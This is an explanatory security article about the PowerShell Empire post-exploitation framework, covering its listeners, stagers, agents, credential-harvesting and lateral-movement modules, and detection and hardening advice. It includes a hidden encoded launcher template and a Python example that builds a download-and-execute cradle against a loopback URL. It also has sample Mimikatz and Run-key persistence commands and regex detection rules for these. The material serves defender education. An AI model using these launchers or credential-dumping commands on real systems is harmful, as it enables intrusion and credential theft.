PowerShell Empire Framework
Post-exploitation framework using PowerShell agents for in-memory operations, credential harvesting, and lateral movement.
# PowerShell Empire Framework
PowerShell Empire is a post-exploitation framework designed for adversary simulation, red team operations, and, frequently, real-world intrusion campaigns. It solves a specific operational problem for attackers and testers alike: how to maintain persistent, flexible control over a compromised host without dropping detectable executables to disk. By conducting its operations inside PowerShell's runtime and the .NET framework, Empire sidesteps file-scanning antivirus in a way that disk-resident malware cannot. Its architecture reflects a broader shift in offensive tradecraft toward living-off-the-land techniques, where the operating system's own tools become the weapon. Security professionals who understand Empire's mechanics understand the template that modern threat actors follow, whether or not those actors use Empire itself.
---
PowerShell Empire is an open-source, modular post-exploitation framework released in 2015 by harmj0y, sixdub, and enigma0x3. It operates primarily through PowerShell agents on Windows targets, with a Python-based server handling command-and-control (C2) infrastructure. The framework is explicitly designed for the post-exploitation phase of an intrusion: it assumes the attacker already has an initial foothold and focuses on what happens next, including credential theft, lateral movement, persistence, and data collection.
Empire is not a vulnerability scanner, an exploit delivery platform, or a network reconnaissance tool in the traditional sense. It does not exploit software vulnerabilities to gain initial access. Distinguishing Empire from tools like Metasploit is important: Metasploit covers the full attack lifecycle including exploitation, while Empire specializes in the phase after access is gained.
Variants and successors matter here. The original EmpireProject repository was archived in 2019, but the BC-Security fork (Empire 3.0 onward) continued active development and remains in widespread use across both red team engagements and, according to multiple threat intelligence reports, actual intrusion campaigns. Starkiller, a separate graphical front end that drives the Empire server through its REST API, was added alongside the fork. The framework also inspired related projects including Covenant (C#), Merlin (Go), and Havoc, which follow similar architectural philosophies.
Empire is not equivalent to a RAT (Remote Access Trojan) in the traditional sense, though it provides overlapping capabilities. The distinction lies in design intent and architecture: Empire is a framework with composable modules rather than a monolithic implant.
---
Empire's architecture rests on three core components: listeners, stagers, and agents. Understanding how these interact explains why the framework is both powerful and difficult to detect with conventional tools.
Listeners are the server-side processes that wait for incoming connections from compromised machines. Empire supports multiple listener types including HTTP, HTTPS, and malleable profiles that mimic legitimate web traffic. A common configuration mimics the communication patterns of known content delivery networks or popular web services, making network-level detection harder. The listener configuration determines how often agents check in (the callback interval and its jitter), what URIs and HTTP headers to use, and how to handle dropped connections.
Stagers are the delivery mechanism. A stager is a small, lightweight piece of code whose sole job is to pull down the full Empire agent and execute it in memory. A typical stager is a one-liner PowerShell command that downloads a payload with a web client call and hands it to Invoke-Expression (IEX). For example:

```powershell
powershell -NoP -sta -NonI -W Hidden -Enc [BASE64_ENCODED_PAYLOAD]
```

The switches are -NoP (skip profile scripts), -sta (single-threaded apartment), -NonI (non-interactive) and -W Hidden (no console window); -Enc takes the Base64 encoding of the UTF-16LE command text. Execution policy never enters the picture, because it governs script files, not commands passed on the command line. The decoded command contacts the listener and retrieves the full agent, which runs in memory. Because no script file is written to disk, antivirus that only scans files at rest has nothing to inspect. The launcher itself still shows up in process creation logs, and AMSI sees the script text before it runs, which is why Empire also ships AMSI bypass options for its stagers.
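As an added example (not Empire's own launcher code, and not code from this page's author), the following Python shows how the -Enc argument is produced from plaintext and, more usefully for a defender, how to reverse it from a recorded command line and score the switches together with the decoded text. The download cradle, the loopback URL and the indicator threshold are constructed for illustration.

```python
import base64
import re

# Constructed download cradle of the kind a stager one-liner carries.
# The URL is a loopback placeholder, not a real listener (assumption for this example).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/index.asp')"

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_FLAGS = ("-e", "-ec", "-en", "-enc", "-encoded", "-encodedcommand")


def encode_command(script):
    """-EncodedCommand expects Base64 over the UTF-16LE bytes of the command text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def build_launcher(script):
    """Assemble a launcher in the shape the page shows. The command is passed on the
    command line, not as a .ps1 file, so the execution policy is never consulted."""
    return "powershell -NoP -sta -NonI -W Hidden -Enc " + encode_command(script)


def split_launcher(cmdline):
    """Return (switches without the blob, Base64 blob or None)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENC_FLAGS:
            return " ".join(tokens[:i] + tokens[i + 2:]), tokens[i + 1]
    return cmdline, None


def decode_launcher(cmdline):
    """Recover the plaintext a defender wants from a 4688 / Sysmon command line."""
    _, blob = split_launcher(cmdline)
    if blob is None:
        return None
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Indicators are checked over the switches plus the decoded text, never over the raw
# blob, whose Base64 alphabet would produce chance matches.
INDICATORS = [
    ("download_cradle", re.compile(r"(Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest)", re.I)),
    ("iex", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+(h(idden)?|1)\b", re.I)),
    ("noprofile", re.compile(r"-nop(rofile)?\b", re.I)),
    ("noninteractive", re.compile(r"-noni(nteractive)?\b", re.I)),
]


def score_launcher(cmdline, threshold=3):
    """Decode if possible and count indicator hits; threshold is an illustrative cutoff."""
    switches, _ = split_launcher(cmdline)
    plain = decode_launcher(cmdline)
    text = switches + ("\n" + plain if plain else "")
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return {"decoded": plain, "indicators": hits, "suspicious": len(hits) >= threshold}


if __name__ == "__main__":
    launcher = build_launcher(CRADLE)
    print(launcher)
    print(score_launcher(launcher))
```

Scoring on the decoded text rather than the blob is the point: a process-creation event carries only the Base64, and a rule that keys on the literal string `DownloadString` fires only after this decode step.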
Agents are the implants that run on the compromised host. Once an agent checks in, the operator gains an interactive session. The agent communicates with the listener on a configurable schedule, retrieving task instructions and returning results. All traffic between agent and listener is encrypted. In Empire's staging protocol the stager carries a per-listener staging key, the first stage uses it to deliver an agent-generated RSA public key, and the server answers with an AES session key encrypted to that public key; tasking thereafter is AES-encrypted with an HMAC over each message, so the session key never crosses the wire in the clear.
Once an agent is active, the operator accesses a module library covering several attack categories:
Credential harvesting uses Mimikatz integration to dump password hashes, Kerberos tickets, and plaintext credentials from LSASS memory. The operator runs a command like usemodule credentials/mimikatz/logonpasswords, and the module executes Mimikatz entirely in memory using PowerShell reflection, never touching disk.
Lateral movement modules include options for Pass-the-Hash, Pass-the-Ticket, and WMI-based remote execution. An operator can take harvested credentials and pivot to additional hosts on the same network without ever using a traditional exploitation technique.
Persistence modules write to common persistence locations: scheduled tasks, registry run keys, WMI event subscriptions, and startup folders. Each method has different detection profiles, and Empire makes it easy to rotate between them.
Situational awareness modules enumerate local administrators, domain controllers, active sessions, and network shares, building a picture of the environment that guides further operations.
A concrete scenario: A phishing email delivers a malicious Office document with a macro. The macro executes a PowerShell stager that calls back to the Empire listener. The agent checks in. The operator runs Mimikatz in memory and retrieves the domain administrator's NTLM hash. Using a Pass-the-Hash module, the operator authenticates to the domain controller, runs a new stager on that host, and has a second agent with domain-level privileges. The entire chain, from initial phishing to domain compromise, leaves minimal disk artifacts. The only forensic trail is in PowerShell logs, Windows event logs, and network traffic, and only if those are properly configured and monitored.
This scenario is not hypothetical. Variants of this chain appear in multiple documented intrusion reports involving threat actors including APT19, FIN7-adjacent groups, and various ransomware precursor campaigns.
Detection considerations for defenders: Empire's primary detection surface is behavioral. Script Block Logging (Event ID 4104) records script text as the engine executes it, after any Base64 or string obfuscation has been resolved, so the plaintext cradle and modules appear even when the command line did not show them. Module Logging (Event ID 4103) and process creation auditing with command-line capture (Event ID 4688, or Sysmon Event ID 1) record the launcher itself, including the -Enc blob. AMSI (Antimalware Scan Interface) lets security products inspect script content before execution, with the caveat that Empire ships AMSI bypass options, so AMSI is one layer rather than the control. Constrained Language Mode restricts PowerShell to a subset of functionality that stops most Empire modules, which depend on .NET reflection, from running. Network-based detection focuses on beaconing patterns (regular callback intervals with jitter) and on HTTP profiles that do not match the traffic they claim to be.
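An added example, not from the page's author or from Empire, that runs the detection logic just described over constructed Event ID 4104 style records and constructed request timestamps. The user names, script text, rule set and the 0.25 coefficient-of-variation cutoff for beaconing are assumptions for illustration; the `excluded_users` parameter exists to show what the common SIEM tuning of dropping service-account noise costs.

```python
import re
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Constructed events in the shape a SIEM might normalise Event ID 4104 (Script Block
# Logging) records into. Users and script text are invented for this example.
SCRIPT_BLOCKS = [
    {"id": "a1", "user": "CORP\\alice",
     "text": "Get-ChildItem C:\\Reports | Where-Object Length -gt 1MB"},
    {"id": "a2", "user": "CORP\\svc_backup",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/index.asp')"},
    {"id": "a3", "user": "CORP\\svc_backup",
     "text": "[System.Reflection.Assembly]::Load($bytes); Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"},
    {"id": "a4", "user": "CORP\\bob",
     "text": "Set-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name Updater -Value 'powershell -NoP -W Hidden -Enc AAAAAAAAAAAAAAAA'"},
]

# 4104 holds already-decoded script text, so these rules match plaintext. An -Enc blob
# only appears here when a script writes a launcher somewhere, as a4 does into a Run key.
RULES = [
    ("download_cradle", re.compile(r"(Net\.WebClient|DownloadString|Invoke-WebRequest)", re.I)),
    ("invoke_expression", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    ("reflective_load", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I)),
    ("mimikatz", re.compile(r"(Invoke-Mimikatz|sekurlsa::)", re.I)),
    ("run_key_persistence", re.compile(r"CurrentVersion\\Run\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
]


def evaluate(events, excluded_users=()):
    """Apply RULES to each script block and return {event id: [rule names]}.
    excluded_users reproduces the tuning of skipping 'noisy' accounts entirely."""
    findings = {}
    for ev in events:
        if ev["user"] in excluded_users:
            continue
        hits = [name for name, rx in RULES if rx.search(ev["text"])]
        if hits:
            findings[ev["id"]] = hits
    return findings


def beacon_score(timestamps, min_samples=6):
    """Coefficient of variation of the gaps between requests from one host to one
    destination. A sleep-with-jitter agent yields a small value; a person does not."""
    ts = sorted(timestamps)
    if len(ts) < min_samples:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mu = mean(gaps)
    return pstdev(gaps) / mu if mu > 0 else None


def is_beacon(timestamps, max_cv=0.25):
    """Illustrative cutoff: an agent with roughly 10% jitter lands well under 0.25."""
    cv = beacon_score(timestamps)
    return cv is not None and cv <= max_cv


# Constructed request times: an agent on a 60 s interval with about 10% jitter,
# and a user browsing the same site.
_t0 = datetime(2024, 1, 1, 12, 0, 0)
AGENT_REQUESTS = [_t0 + timedelta(seconds=s) for s in (0, 58, 121, 178, 243, 299, 362, 419)]
BROWSER_REQUESTS = [_t0 + timedelta(seconds=s) for s in (0, 3, 4, 90, 95, 400, 402, 1500)]

if __name__ == "__main__":
    print(evaluate(SCRIPT_BLOCKS))
    print(evaluate(SCRIPT_BLOCKS, excluded_users=("CORP\\svc_backup",)))
    print(round(beacon_score(AGENT_REQUESTS), 3), round(beacon_score(BROWSER_REQUESTS), 3))
```

Run with the service account excluded, the two events that matter most (the cradle and the in-memory Mimikatz call) disappear from the output while the low-value Run-key hit survives, which is exactly the failure mode of filtering by account rather than by behaviour.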
---
Empire matters because it codified and packaged techniques that were previously the domain of nation-state actors and made them accessible to any attacker with basic technical skills. The framework's release in 2015 created a measurable shift in how defenders had to think about endpoint security.
Before Empire's wide adoption, many organizations treated PowerShell as a trusted administrative tool, exempt from the scrutiny applied to executable files. Empire exposed that assumption as wrong. The PowerShell 5.0 release in 2015 brought Script Block Logging, AMSI integration, and Constrained Language Mode enforcement tied to application control, and hardening baselines such as the CIS Benchmarks for Windows now call for script block logging to be enabled. These improvements were not theoretical exercises; they answered documented attacker tradecraft that Empire and the PowerSploit tooling it built on made visible and repeatable in red team testing.
The misconception most worth addressing is that Empire's official deprecation in 2019 made it irrelevant. It did not. The BC-Security fork remains active. More importantly, Empire's techniques have been absorbed into the broader threat actor toolkit. Groups do not need Empire itself; they need the concepts, and those concepts appear regularly in threat intelligence reporting. MITRE ATT&CK documents dozens of techniques that map directly to Empire modules, including T1059.001 (PowerShell), T1003 (OS Credential Dumping), T1021 (Remote Services), and T1053 (Scheduled Task/Job).
A documented consequence: The 2017 SANS incident analysis of several healthcare sector intrusions found that attackers used Empire-based tradecraft to move laterally for weeks before detection. The average dwell time in those cases exceeded 90 days. The attackers harvested credentials, pivoted across clinical and administrative networks, and established multiple persistence mechanisms. The damage included both data exposure and operational disruption. The root failure was not a missing patch; it was inadequate PowerShell visibility and no behavioral detection capability.
The business impact extends beyond incident response costs. Regulatory and assurance frameworks including HIPAA, PCI DSS, and SOC 2 require organizations to demonstrate that they can detect and respond to this class of intrusion. An organization that cannot detect in-memory PowerShell execution has a compliance gap as well as a security gap. Understanding Empire is not academic; it is a requirement for building detection engineering programs that satisfy both security objectives and regulatory requirements.
---
CDA approaches the PowerShell Empire Framework through the Planetary Defense Model (PDM), primarily under the Threat Intelligence Domain (TID) with secondary relevance to Vulnerability and System Defense (VSD). The PDM methodology here is Predictive Defense Intelligence (PDI): see the threat before it sees you.
From a PDI standpoint, Empire is a forcing function for detection engineering maturity. CDA analysts do not treat Empire as a solved problem just because it is well-documented. Instead, they treat it as a baseline: any organization that cannot detect Empire-style tradecraft in their environment has not cleared the minimum bar for post-exploitation visibility. PDI means building detection logic ahead of attacker actions, not in response to confirmed incidents.
Operationally, CDA applies Empire knowledge in three ways. First, threat modeling exercises use Empire's module library as a reference catalog for attacker capability. If a client environment cannot detect a specific Empire module, that gap is logged as a TID finding and tracked against MITRE ATT&CK technique mappings. Second, red team assessments include Empire-based scenarios explicitly to test whether defensive controls (AMSI, Script Block Logging, endpoint detection and response tools) perform as configured. Third, intelligence products that CDA produces for clients include Empire-variant indicators, covering both the BC-Security fork and Empire-inspired tooling observed in active campaigns.
What CDA does differently is connect the framework's mechanics directly to a client's specific detection stack. Generic guidance says "enable Script Block Logging." CDA guidance says "your SIEM is ingesting Windows Event ID 4104, but your detection rule filters out events from administrative service accounts, which is exactly the account an Empire agent would run under in this environment." That specificity is the difference between a checkbox and a working detection.
VSD relevance covers the hardening side: enforcing Constrained Language Mode where feasible (in practice through AppLocker or WDAC script rules, which is what switches the mode on), auditing which accounts hold the right to run PowerShell remotely, and removing the PowerShell 2.0 engine so the runtime cannot be downgraded past logging and AMSI. Execution policy belongs on the list only as a hygiene setting: it is not a security boundary, and the launcher shown earlier passes a command rather than a script file, so the policy is never consulted. The remaining controls directly degrade Empire's operational effectiveness.
---
Written by CDA Editorial